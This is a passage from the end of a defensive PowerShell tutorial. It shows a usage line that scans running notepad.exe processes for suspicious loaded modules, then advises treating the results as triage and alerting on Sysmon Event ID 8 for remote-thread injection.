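# Usage (assumed target): examine every running notepad.exe and print the findings.
Get-Process -Name notepad -ErrorAction SilentlyContinue |
    ForEach-Object { Get-SuspiciousModules -ProcessId $_.Id } |
    Format-Table -AutoSize
```

Treat the output as a triage aid rather than a verdict: unsigned in-house or vendor dlls in a product's own folder pass the path check but fail the signature check, so expect some noise until the trusted roots are tuned. The script also only sees the end state; the CreateRemoteThread step the tutorial relies on is what Sysmon records as Event ID 8, which is the better real-time signal to alert on.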